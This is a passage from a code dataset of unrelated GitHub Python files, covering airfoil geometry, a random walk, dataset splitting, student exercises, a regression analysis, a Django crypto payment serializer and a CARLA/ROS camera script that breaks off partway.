RuntimeError(msg.format(repr(sampling)))\n\n lst_c, lst_u, lst_l = [], [], []\n for xc in xgen:\n yt = 5 * t * (c0 * sqrt(xc) +\n c1 * xc +\n c2 * xc ** 2 +\n c3 * xc ** 3 +\n c4 * xc ** 4)\n # zero camber\n if m == 0:\n yc = 0\n xu, yu = xc, yt\n xl, yl = xc, -yt\n else:\n if xc <= p:\n yc = m / p ** 2 * (2 * p * xc - xc ** 2)\n dycdx = 2 * m / p ** 2 * (p - xc)\n else:\n yc = m / (1 - p) ** 2 * ((1 - 2 * p) + 2 * p * xc - xc ** 2)\n dycdx = 2 * m / (1 - p) ** 2 * (p - xc)\n theta = atan(dycdx)\n xu, yu = xc - yt * sin(theta), yc + yt * cos(theta)\n xl, yl = xc + yt * sin(theta), yc - yt * cos(theta)\n lst_c.append((xc, yc))\n lst_u.append((xu, yu))\n lst_l.append((xl, yl))\n return lst_c, lst_u, lst_l\n\n\ndef airfoil_le_parameter(curve, sample=25, sweeps=4, precision=1.0e-7):\n \"\"\"Return parameter of LE point on ``curve``. By default, it will do 4\n consecutive ``sweeps`` with a ``sample`` size of 25 to walk to the point\n with maximum curvature.\n\n >>> # some airfoil curve\n >>> airfoil = FittedCure(points=[pt1, pt2, ...])\n >>> airfoil_le_parameter(airfoil)\n 0.5\n\n :param parapy.geom.occ.curve.Curve curve: airfoil curve\n :param int sample: number of sample points per sweep\n :param int sweeps: number of sweeps\n :param float precision: resolution for GeomLProp_CLProps\n :rtype: float\n \"\"\"\n props = GeomLProp_CLProps(curve.Handle_Geom_Curve, 2, precision)\n\n u1, u2 = curve.u1, curve.u2\n\n for _ in range(sweeps):\n lst = []\n for u in linspace(u1, u2, sample):\n props.SetParameter(u)\n r = props.D2().Magnitude()\n lst.append((r, u))\n\n elt = max(lst, key=itemgetter(0))\n idx = lst.index(elt)\n\n if idx == 0 or idx == sample - 1:\n return elt[0]\n\n u1 = lst[idx - 1][1]\n u2 = lst[idx + 1][1]\n\n elt = max(lst, key=itemgetter(0))\n return elt[1]\n","repo_name":"msaezo/KBE","sub_path":"PythonFolder/venv/Lib/site-packages/parapy/lib/avl/airfoil.py","file_name":"airfoil.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38040593551","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(12)\n\nN_steps = 1000000\nexpected_R = np.sqrt(N_steps)\nrepeats = 5\n\nmax_val = 0\nmin_val = 0\n\nfor i in range(repeats):\n ###################################\n # generate one random walk #\n ###################################\n # a list of 4 directions 0,1,2,3\n dirs = np.random.randint(0, 4, N_steps)\n # a 2D list of steps, empty for now\n steps = np.empty((N_steps, 2))\n # fill the list of steps according to direction\n steps[dirs == 0] = [0, 1] # 0 - right\n steps[dirs == 1] = [0, -1] # 1 - left\n steps[dirs == 2] = [1, 0] # 2 - up\n steps[dirs == 3] = [-1, 0] # 3 - down\n ###################################\n # use cumsum to sum up the individual steps to get current position\n steps = steps.cumsum(axis=0)\n ###################################\n print(\"Final position:\", steps[-1])\n\n\n ###################################\n xs = steps[::, 0]\n ys = steps[::, 1]\n\n ds = np.sqrt(np.power(xs, 2) + np.power(ys, 2))\n\n d = np.max(ds)\n # print(f\"maxX : {np.max(xs)}, maxY: {np.max(ys)}, dist: {round(d, 1)}\")\n\n\n max_x = np.max(xs)\n if max_x > max_val:\n max_val = max_x\n\n max_y = np.max(ys)\n if max_y > max_val:\n max_val = max_y\n\n min_x = np.min(xs)\n if min_x < min_val:\n min_val = min_x\n\n min_y = np.min(ys)\n if min_y < min_val:\n min_val = min_y\n\n # draw only a selection of points, max 5000, to save memory\n skip = N_steps // 5000 + 1\n xs = xs[::skip]\n ys = ys[::skip]\n\n plt.plot(xs, ys, label=f\"maxdist = {round(d, 1)}\")\n\n###################################\n# add a circle with expected distance\ncircle = plt.Circle((0, 0), radius=expected_R, color=\"k\")\nplt.gcf().gca().add_artist(circle)\n# equal axis size\nplt.gcf().gca().set_aspect(\"equal\")\n###################################\n\nplt.title(f\"{repeats} random walks of {N_steps} steps\")\n\nbounds = max([max_val, min_val*-1])\n\nplt.xlim([bounds*-1, bounds])\nplt.ylim([bounds*-1, bounds])\n\nplt.legend(loc=\"upper left\")\n\nplt.savefig(\"uke_13_oppg_8.png\")\nplt.show()\n","repo_name":"gronnmann/INF100","sub_path":"uke13/uke_13_oppg_8.py","file_name":"uke_13_oppg_8.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12304965364","text":"# split the tweet data into test data and train data\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\nFILE_PATH = r'E:\\大���下\\CIS\\科研\\data2_tweet.csv' # 设置路径\r\ndf = pd.read_csv(FILE_PATH,encoding = \"utf-8\") # 读取文件\r\nX = df.text\r\ny = df.airline_sentiment\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,\r\ntest_size=0.4)\r\ntweet_for_train = {}\r\ntweet_for_train['text'] = X_train\r\ntweet_for_train['label'] = y_train\r\ntrain_data = pd.DataFrame(tweet_for_train)\r\ntweet_for_test = {}\r\ntweet_for_test['text'] = X_test\r\ntweet_for_test['label'] = y_test\r\ntrain_data = pd.DataFrame(tweet_for_train)\r\ntest_data = pd.DataFrame(tweet_for_test)\r\ntrain_data.to_csv('E:\\大三下\\CIS\\科研\\data2_tweet_train.csv',index=False)\r\ntest_data.to_csv('E:\\大三下\\CIS\\科研\\data2_tweet_test.csv',index=False)","repo_name":"Fir-lat/Happy_NLP","sub_path":"split_dataset.py","file_name":"split_dataset.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20126471300","text":"statesDict = {\n 'California' : 38802000,\n 'Texas' : 26956000,\n 'Florida' : 19893000,\n 'New York' : 19746000,\n 'Illinois' : 12880000,\n 'Pennsylvania' : 12787000,\n 'Ohio' : 11594000,\n 'Georgia' : 10097000,\n 'North Carolina': 9943964,\n 'Michigan' : 9909000,\n 'New Jersey' : 8938000\n}\n\n# Iterate using a 'for' loop\nfor state in statesDict:\n population = statesDict[state]\n print(state, population)\n\n# Iterate using items()\nknights = {'gallahad': 'the pure', 'robin': 'the brave'}\nfor key, value in knights.items():\n print(\"{}: {}\".format(key, value))\n","repo_name":"ScottBreitbach/DSC510","sub_path":"Wk8_Dictionaries-Tuples/Slides2.py","file_name":"Slides2.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27145956428","text":"# T(n) = O(N) S(N) = O(1)\r\n\r\n\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\ndef newNode(data):\r\n return Node(data)\r\n\r\ndef reverseList(head):\r\n prev=None\r\n n=head\r\n while n is not None:\r\n next=n.next\r\n n.next=prev\r\n prev=n\r\n n=next\r\n head=prev\r\n return head\r\n\r\ndef addOne(head):\r\n head = reverseList(head) #reverse linkedlist and add 1 to head\r\n k = head\r\n carry = 0\r\n prev = None\r\n head.data += 1\r\n # update carry for next calculation\r\n while(head != None) and (head.data > 9 or carry > 0):\r\n prev = head\r\n head.data += carry\r\n carry = head.data // 10\r\n head.data = head.data % 10\r\n head = head.next\r\n if carry > 0:\r\n prev.next = Node(carry)\r\n # Reverse the modified list\r\n return reverseList(k)\r\n\r\n#########ye push ko dekh re baba\r\ndef push(head,newdata):\r\n newnode=Node(newdata)\r\n newnode.next=head\r\n head=newnode \r\n\r\n\r\ndef printList(head):\r\n if not head:\r\n return\r\n while(head):\r\n print(\"{}\".format(head.data), end=\" \")\r\n head = head.next\r\n\r\n# Driver code\r\nif __name__ == '__main__':\r\n head = newNode(1)\r\n head.next = newNode(9)\r\n head.next.next = newNode(9)\r\n head.next.next.next = newNode(9)\r\n # head=push(1)\r\n # head=push(9)\r\n # head=push(9)\r\n # head=push(9)\r\n print(\"List is: \", end=\"\")\r\n printList(head)\r\n head = addOne(head)\r\n print(\"\\nResultant list is: \", end=\"\")\r\n printList(head)\r\n","repo_name":"shrutii2/Linked-List-in-Python","sub_path":"addonetolastnode.py","file_name":"addonetolastnode.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11451840066","text":"from sklearn.decomposition import PCA\r\nfrom sklearn import metrics\r\nfrom sklearn.feature_selection import RFECV\r\nfrom sklearn import linear_model\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn import decomposition\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.model_selection import cross_val_predict\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom statistics import mode\r\nfrom IPython.display import display, HTML\r\nimport timeit\r\n\r\nclass ResultSet():\r\n def __init__(self, title, predicted, actual, selector = None):\r\n self.title = title\r\n self.difference = []\r\n self.predicted = predicted\r\n self.actual = actual\r\n self.percentage = []\r\n self.score = metrics.r2_score(actual,predicted)\r\n self.selector = selector\r\n i = 0\r\n for act in actual:\r\n self.difference.append(predicted[i] - act)\r\n self.percentage.append(((self.difference[i])/(act))*100)\r\n i+=1\r\n\r\n\r\n\r\n\r\ndef corr_matrix():\r\n corr = data.corr()\r\n map = sns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True),\r\n square=True)\r\n map.set_xticklabels(labels, rotation=90)\r\n map.set_yticklabels(labels, rotation=0)\r\n sns.set(font_scale=1.5)\r\n #plt.show()\r\n\r\ndef boxplot(result, x_label = 'x',y_label = 'y',title= \"Figure\",save = False):\r\n sns.boxplot(result)\r\n plt.xlabel(x_label)\r\n plt.xticks(np.arange(-1000,2500,step=250))\r\n plt.xlim([-1000,2500])\r\n plt.ylabel(y_label)\r\n plt.title(title)\r\n plt.tight_layout()\r\n plt.minorticks_on()\r\n sns.swarmplot(result, color='orange')\r\n if save:\r\n plt.savefig(title+\".jpg\")\r\n #plt.show()\r\n\r\ndef jointplot(feature, comparator,mode = 'reg'):\r\n sns.jointplot(feature,comparator,kind=mode)\r\n plt.savefig(mode+'_'+feature.name+'_'+comparator.name+'.jpg')\r\n #plt.close()\r\n\r\ndef jointplot_all():\r\n for label in labels:\r\n for label_2 in labels:\r\n if label_2!=label:\r\n jointplot(data[label],data[label_2])\r\n jointplot(data[label], data[label_2],'kde')\r\n #plt.show()\r\n\r\ndef simple_plot(y_list,title = 'Figure', save = False):\r\n plt.figure()\r\n plt.plot(range(0, len(y_list)), y_list, 'ro')\r\n plt.plot([0, len(y_list)], [0, 0], linewidth=3)\r\n plt.title(title)\r\n if save:\r\n plt.savefig(title + \".jpg\")\r\n #plt.show()\r\n\r\ndef principal_component_analysis(n):\r\n pca = PCA(n_components=n)\r\n data = pca.fit_transform(x)\r\n predictions = cross_val_predict(clf, data, y, cv=10)\r\n print(metrics.r2_score(y, predictions))\r\n simple_plot(predictions,\"PCA n=\"+str(n))\r\n\r\ndef cv_predict(X,Y,algo):\r\n selector = RFECV(algorithms[algo], cv=10)\r\n selector.fit(X, Y)\r\n predictions = selector.predict(X)\r\n result_set = ResultSet(algo, predictions, Y, selector)\r\n return result_set\r\n\r\ndef algorithm_tests():\r\n #Stage one get results\r\n results = []\r\n rtable = pd.DataFrame()\r\n for algo in algorithms:\r\n rset = cv_predict(x,y,algo)\r\n results.append(rset)\r\n rtable[algo] = rset.predicted\r\n rtable[algo+'_difference'] = rset.difference\r\n rtable[algo+'_percent'] = rset.percentage\r\n print(algo)\r\n print('Optimal number of features is ', rset.selector.n_features_)\r\n print(\"r2 score:\", rset.score, '\\n')\r\n boxplot(rtable[algo + \"_percent\"], title=\"Boxplot (Percentage Error) \" +algo+ \" r2 score=\"+str(round(rset.score,4)) + \" Std=\"+str(round(np.std(rtable[algo + \"_percent\"]),2)), y_label='', save=True)\r\n plt.show()\r\n \r\n #get results > 100% error\r\n targetted = rtable[rtable[\"Linear Regression_percent\"]>90]\r\n print(\"Linear Regression targetted test: train with instances showing > 90% error\")\r\n print(\"Number of instances : \", len(targetted))\r\n\r\n #Fetch instances\r\n instances = data.iloc[targetted.index]\r\n #Join instances (for now just having a look to see if there's patterns in percentile error bands)\r\n targetted = targetted.join(instances)\r\n selector = RFECV(clf,cv=10)\r\n\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\nFor isolated target instances\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n for column in labels:\r\n print(column+\" : \\n\\t\",\"max=\"+str(max(targetted[column])),\"\\t\\t\\t\\t\\tmin=\"+str(min(targetted[column])),\"\\t\\t\\t\\t\\tmean=\"+str(np.mean(targetted[column])),\"\\t\\t\\t\\t\\tstd=\"+str(np.std(targetted[column])))\r\n #Get subset of targetted indices in dataset\r\n X = x[targetted.index.values]\r\n Y = y[targetted.index.values]\r\n rset = cv_predict(X,Y,\"Linear Regression\")\r\n boxplot(rset.percentage, title=\"Boxplot (Percentage Error) Overfitted Linear Regression model Std = \"+str(round(np.std(rset.percentage),2)), y_label='', save=True)\r\n print(\"r2 score: \",rset.score)\r\n file = open('results.html', 'w')\r\n file.write(targetted.to_html())\r\n file.close()\r\n file = open('percentages.html', 'w')\r\n p = []\r\n for result in rtable:\r\n if result.__contains__('percent'):\r\n p.append(result)\r\n file.write(targetted[p].to_html())\r\n file.close()\r\n\r\n\r\ndef knr_fit_predict(knr,instance):\r\n # Get the index array for nearest neighbours to instance\r\n neighbors = (knr.kneighbors(instance.reshape(1, -1))[1][0])\r\n # exclude the 0th value, which is the instance itself in our data\r\n neighbors = neighbors[1:]\r\n # array index training data\r\n X = x[neighbors]\r\n Y = y[neighbors]\r\n # fit model\r\n rfecv = RFECV(clf)\r\n clf.fit(X,Y)\r\n return clf.predict(instance.reshape(1, -1))\r\n\r\n'''Performs cross validationa across all instances in the data set using the n Nearest Neighbours'''\r\ndef param_KNearest_CV(n=178, weight=\"distance\"):\r\n results = []\r\n knr = KNeighborsRegressor(n_neighbors=n, weights=weight)\r\n knr.fit(x, y)\r\n for instance in x:\r\n #add prediction to list of results\r\n results.append(knr_fit_predict(knr,instance)[0])\r\n #make result set\r\n rs = ResultSet(\"Linear Regression\", results,y)\r\n return rs\r\n\r\ndef hpo_knn():\r\n results = []\r\n best = None\r\n best_n = 0\r\n #Distance weighting outperforms uniform\r\n weight = \"distance\"\r\n best_w = \"\"\r\n range_n = range(160 ,200,1)\r\n print(\"n values\", list(range_n))\r\n for n in range_n:\r\n rs = param_KNearest_CV(n,weight)\r\n if best is None:\r\n print(\"score=\", rs.score, \"weight=\", weight, \"n=\", n)\r\n best = rs\r\n best_n = n\r\n best_w = weight\r\n else:\r\n if best.score < rs.score:\r\n print(\"New best : score=\",rs.score,\"weight=\",weight,\"n=\",n)\r\n best = rs\r\n best_n = n\r\n best_w = weight\r\n results.append(rs.score)\r\n sns.pointplot(x=list(range_n),y=results)\r\n plt.show()\r\n boxplot(best.percentage,title=\"Best KNN n=\"+str(best_n)+\" w=\" +str(best_w)+\" score=\"+str(round(best.score,3))+\" std=\"+str(round(np.std(best.percentage),2)))\r\n plt.show()\r\n\r\ndef timeit_call():\r\n knr = KNeighborsRegressor(n_neighbors=178, weights=\"distance\")\r\n knr.fit(x, y)\r\n knr_fit_predict(knr,x[240])\r\n\r\ndef main():\r\n #Tests algorithms\r\n #algorithm_tests()\r\n\r\n #Time taken for single prediction\r\n #print(\"execution time\",timeit.timeit(timeit_call,number=1))\r\n\r\n #Hyper parameter optimization of KNN similar day fitting for K = number of similar days used\r\n #hpo_knn()\r\n\r\n\r\n #KNN Cross Validation\r\n rs = param_KNearest_CV()\r\n boxplot(rs.percentage,title=\"KNN Trained Linear Regression r2 score=\"+str(round(rs.score,4)) + \" Std=\"+str(round(np.std(rs.percentage),2)))\r\n plt.show()\r\n print(rs.score)\r\n\r\n\r\n'''Load Data and Call Main'''\r\n\r\n#Load CSV\r\ndata = pd.read_csv(\"fulldataset.csv\", delimiter=';')\r\n\r\n#Drop all NaN and non informative days\r\ndata = data.dropna(axis=0)\r\ndata = data[data['Power Generated'] != 0]\r\n#reset index for dropped rows\r\ndata.reset_index(inplace=True, drop=True)\r\n\r\n\r\n#Grab column names\r\nlabels = list(data.drop(\"Date\",axis=1).columns.values)\r\n\r\n#seperate data into target data and feature data\r\ny = data[\"Power Generated\"]\r\nx = data.drop([\"Power Generated\",\"Date\"],axis=1)\r\n\r\n\r\n#scale data\r\nscaler = StandardScaler()\r\nx=scaler.fit_transform(x)\r\n\r\nclf = linear_model.LinearRegression()\r\n\r\n\r\nalgorithms = {\"Linear Regression\": linear_model.LinearRegression() , \"Ridge Regression\" : linear_model.Ridge(), \"Lasso Regression\" : linear_model.Lasso(),\"ElasticNet\": linear_model.ElasticNet()}\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Sherkdavid/FYP","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14118676349","text":"'''\nnumpy_to_png.py\n\nConvert all numpy array files in the given file structure to png images\n\n'''\n\n\nimport sys, os \nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndef main(source_path, dest_path):\n for root, dirs, files in os.walk(source_path):\n pid = os.path.basename(root)\n if not pid:\n continue\n result_person_dir = os.path.join(dest_path, pid)\n os.makedirs(result_person_dir, exist_ok = True)\n for file in files:\n result_matrix = np.load(os.path.join(root, file))\n png_file = file.split('.')[0] + '.png'\n plt.axes([0,0,1,1])\n plt.axis(\"off\")\n plt.imsave(os.path.join(result_person_dir, png_file), result_matrix, cmap='coolwarm')\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2])\n\n\n\n","repo_name":"milesizydorczak12/Fingerprint-Correlation","sub_path":"helpful_scripts/numpy_to_png.py","file_name":"numpy_to_png.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40833273601","text":"import os\r\nimport sys\r\nimport pandas \r\nimport argparse\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef DataV1(data):\r\n # Mean, Median, Mode for relative data: \r\n df_mean_elo_pre = data[[\"elo1_pre\", \"elo2_pre\"]].mean()\r\n df_mean_eloPreDiff = data[[\"eloPreDiff\"]].mean()\r\n df_mean_eloProbDiff = data[[\"eloProbDiff\"]].mean()\r\n print(df_mean_elo_pre)\r\n print(df_mean_eloPreDiff)\r\n print(df_mean_eloProbDiff)\r\n\r\ndef DataV2(data):\r\n # indivual overal score:\r\n eloYes = 0\r\n eloNo = 0\r\n\r\n for row in range(data.shape[0]):\r\n if data[\"binaryEloProb1\"][row] == data[\"result1\"][row]:\r\n eloYes+=1\r\n else: \r\n eloNo+=1\r\n\r\n print(eloYes, eloNo)\r\n \r\n ratingYes = 0\r\n ratingNo = 0\r\n\r\n for row in range(data.shape[0]):\r\n if data[\"binaryRatingProb1\"][row] == data[\"result1\"][row]:\r\n ratingYes+=1\r\n else: \r\n ratingNo+=1\r\n print(ratingYes, ratingNo)\r\n\r\n eloWrongRatingRightYes = 0\r\n eloWrongRatingRightNO = 0\r\n\r\n eloRightRatingWrongYes = 0\r\n eloRightRatingWrongNO = 0\r\n\r\n for row in range(data.shape[0]):\r\n if data[\"binaryEloProb1\"][row] == data[\"result1\"][row] & data[\"binaryRatingProb1\"][row] != data[\"result1\"][row]:\r\n eloRightRatingWrongYes+=1\r\n if data[\"binaryEloProb1\"][row] != data[\"result1\"][row]: \r\n eloRightRatingWrongNO+=1\r\n print(eloRightRatingWrongYes, eloRightRatingWrongNO)\r\n\r\n elRightRatingRightYes = 0\r\n eloRightRatingRightNO = 0\r\n\r\n for row in range(data.shape[0]):\r\n if data[\"binaryEloProb1\"][row] == data[\"result1\"][row] & data[\"binaryRatingProb1\"][row] == data[\"result1\"][row]:\r\n elRightRatingRightYes+=1\r\n if data[\"binaryEloProb1\"][row] != data[\"result1\"][row] & data[\"binaryRatingProb1\"][row] != data[\"result1\"][row]: \r\n eloRightRatingRightNO+=1\r\n print(elRightRatingRightYes, eloRightRatingRightNO)\r\n\r\ndef main():\r\n #get data file\r\n parser = argparse.ArgumentParser(description='Data Mine Mark 1 Data Sets.')\r\n parser.add_argument('log_file', help='Mark 1 Data log file to parse')\r\n args = parser.parse_args()\r\n\r\n log_file = args.log_file\r\n #print(log_file)\r\n\r\n #put into pandas\r\n\r\n allData = pandas.read_excel(log_file)\r\n binaryData = allData[[\"binaryEloProb1\", \"binaryEloProb2\", \"binaryRatingProb1\", \"binaryRatingProb2\", \"result1\", \"result2\"]]\r\n\r\n DataV1(allData)\r\n DataV2(binaryData)\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"rshaw11/hatsForBats","sub_path":"hatsForBats.py","file_name":"hatsForBats.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14625752107","text":"import unittest\nfrom sort_fractions import sort_fractions\n\nclass TestSortFractions(unittest.TestCase):\n\tdef test_when_sorting_ascending_and_denominators_are_equal(self):\n\t\tfractions = [(4, 5), (2, 5), (3, 5), (1, 5)]\n\n\t\tresult = sort_fractions(fractions, asc=True)\n\n\t\texpected = [(1, 5), (2, 5), (3, 5), (4, 5)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_descending_and_denominators_are_equal(self):\n\t\tfractions = [(4, 5), (2, 5), (3, 5), (1, 5)]\n\n\t\tresult = sort_fractions(fractions, asc=False)\n\n\t\texpected = [(4, 5), (3, 5), (2, 5), (1, 5)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_ascending_and_denominators_are_different(self):\n\t\tfractions = [(2, 3), (1, 2), (1, 3)]\n\n\t\tresult = sort_fractions(fractions)\n\n\t\texpected = [(1, 3), (1, 2), (2, 3)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_descending_and_denominators_are_different(self):\n\t\tfractions = [(2, 3), (1, 2), (1, 3)]\n\n\t\tresult = sort_fractions(fractions, False)\n\n\t\texpected = [(2, 3), (1, 2), (1, 3)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_with_multiple_fractions_and_without_asc_parameter(self):\n\t\tfractions = [(5, 6), (22, 78), (22, 7), (7, 8), (9, 6), (15, 32)]\n\n\t\tresult = sort_fractions(fractions)\n\n\t\texpected = [(22, 78), (15, 32), (5, 6), (7, 8), (9, 6), (22, 7)]\n\t\tself.assertEqual(result, expected)\n\nif __name__ == '__main__':\n\tunittest.main()","repo_name":"Boyko03/Python101","sub_path":"week_2/friday_tasks/fractions/test_sort_fractions.py","file_name":"test_sort_fractions.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2355795995","text":"# Garrett Jordan\n\nwords = []\n\n# Function to check if the word is an anagram\n# Creates lists from both strings and sorts them\ndef isAnAnagram(word, user):\n\twordList= list(word)\n\twordList.sort()\n\treturn (wordList == user)\n\n# Takes sorted input, filters words to words of same length\n# loops over filtered words and uses isAnAnagram function\ndef getAnagrams(user):\n\tlister = [word for word in words if len(word) == len(user) ]\n\tfor item in lister:\n\t\tif isAnAnagram(item, user):\n\t\t\tyield item\n\n# Another method of returning a list similar to original getAnagrams\n# Uses filter and a lamda expression to filter all words in the list that are \n# anagrams of the sorted word. Should be slower.\ndef getAnagrams2(user):\n\tlister = [word for word in words if len(word) == len(user) ]\n\tanagrams = list( filter((lambda x:isAnAnagram(x,user)), lister))\n\treturn anagrams\n\n# Shuffles user input once only\n# Returns sorted list\ndef sortInput(user):\n\twet = list(user)\n\twet.sort()\n\treturn wet\n\ndef test():\n\ta = sortInput('andrew')\n\tgetAnagrams(a)\n\ndef test2():\n\ta = sortInput('andrew')\n\tgetAnagrams2(a)\n\n\n# reads from files to list and closes file\n# Used the f.closed print to demonstrate\n# fact that with keyword executes block, closes file but\n# results in an object i.e. f is available outside block\n# Easily demonstrated by running script in ipython where when\n# exited f can still be accessed by typing f\nwith open('wordlist.txt', 'r') as f:\n\tallwords = f.readlines()\nprint(f.closed)\n\n# Creates a list of words from the files\n# Strips new\nfor x in allwords:\n\tx = x.rstrip()\n\twords.append(x)\ninp = 1\n\n# Takes input\n# while inp != \"99\":\n# \tinp = input(\"enter word:\")\n# \tblah = sortInput(inp)\n# \tresult = getAnagrams(blah)\n# \tprint(list(result))\n# \tprint(getAnagrams2(blah))\n\n\n\n\n\n#Fin\n","repo_name":"helmet33/python-intro","sub_path":"files3.py","file_name":"files3.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23974513609","text":"from rest_framework import serializers\r\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\r\n\r\n\r\nfrom merchant_api.payment_requests.models import PaymentRequest\r\nfrom merchant_api.bip32_ducatus import DucatusWallet\r\nfrom merchant_api.consts import DECIMALS\r\n\r\n\r\n\r\nclass PaymentRequestSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = PaymentRequest\r\n fields = ['shop', 'cart_id', 'original_amount', 'received_amount', 'duc_address', 'state', 'created_at',\r\n 'transfer_state', 'remained_amount', 'transfer_tx']\r\n\r\n def create(self, validated_data):\r\n print('validated_data:', validated_data, flush=True)\r\n shop = validated_data['shop']\r\n cart_id = validated_data['cart_id']\r\n\r\n shop_root_key = DucatusWallet.deserialize(shop.root_keys.key_public)\r\n duc_address = shop_root_key.get_child(cart_id, is_prime=False).to_address()\r\n\r\n validated_data['duc_address'] = duc_address\r\n validated_data['original_amount'] *= DECIMALS['DUC']\r\n validated_data['remained_amount'] = validated_data['original_amount']\r\n\r\n return super().create(validated_data)\r\n\r\n def is_valid(self, raise_exception=False):\r\n if hasattr(self, 'initial_data'):\r\n try:\r\n obj = PaymentRequest.objects.get(**self.initial_data)\r\n except (ObjectDoesNotExist, MultipleObjectsReturned):\r\n return super().is_valid(raise_exception)\r\n else:\r\n self.instance = obj\r\n return super().is_valid(raise_exception)\r\n else:\r\n return super().is_valid(raise_exception)\r\n\r\n def to_representation(self, payment_info):\r\n result = super().to_representation(payment_info)\r\n return result\r\n","repo_name":"DucatusX/ducatus_merchant_api","sub_path":"merchant_api/payment_requests/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74664067074","text":"import glob\nimport os\nimport sys\nfrom weakref import ref\nimport carla\nimport random\nimport time\nimport numpy as np\nimport random\n\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\n\n\nfrom cv_bridge import CvBridge\nimport cv2\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float64, Int16\nfrom PIL import Image as im\n\n\nglobal vehicle\nglobal steer\nglobal throt\n\ntry:\n sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (sys.version_info.major,sys.version_info.minor,'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept:\n pass\n\n\nrospy.init_node('carla_car', anonymous=True)\nimage_pub = rospy.Publisher(\"camera_feed\",Image,queue_size=10)\nstatic_image_pub = rospy.Publisher(\"static_camera_feed\",Image,queue_size=10)\nposx_pub = rospy.Publisher(\"posx\",Float64,queue_size=10)\nposy_pub = rospy.Publisher(\"posy\",Float64,queue_size=10)\nposphi_pub = rospy.Publisher(\"posphi\",Float64,queue_size=10)\nfeature_change_pub = rospy.Publisher(\"feature_change\",Int16,queue_size=10)\nbridge = CvBridge()\n\nglobal i\ni = 0\n\nglobal camera\n\nglobal orientation_camera\n\n\nglobal previous_posphi\nglobal dir_change\n\ndir_change = 0\n\nprevious_posphi = 0\n\ndef rotate_camera(dirr):\n global camera\n global vehicle\n r = camera.get_transform().rotation.yaw -vehicle.get_transform().rotation.yaw + dirr.data\n\n if abs(r) >= 160:\n r = 45\n \n if random.random() > 0.5:\n r = -r\n\n # print(r)\n camera.set_transform(carla.Transform(carla.Location(x=0,y=0,z=2.5),carla.Rotation(yaw= r)))\n\ndef compute_display(image, camera):\n\n global vehicle\n global previous_posphi\n global dir_change\n\n array = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (image.height, image.width, 4))\n\n array = cv2.cvtColor(array,cv2.COLOR_RGB2BGR)\n\n image_pub.publish(bridge.cv2_to_imgmsg(array, \"bgr8\"))\n\n # print('published image')\n\n\n camx = camera.get_transform().location.x\n camy = camera.get_transform().location.y\n camz = camera.get_transform().location.z\n camphi = camera.get_transform().rotation.yaw\n\n posx_pub.publish(camx)\n posy_pub.publish(camy)\n posphi_pub.publish(camphi)\n\n # print(\"runnig \",random.random())\n\n # print(previous_posphi-camphi)\n\n if abs(previous_posphi-camphi) > 1:\n dir_change = 1\n feature_change_pub.publish(1)\n \n else:\n dir_change = 0\n feature_change_pub.publish(0)\n\n previous_posphi = camphi\n\ndef 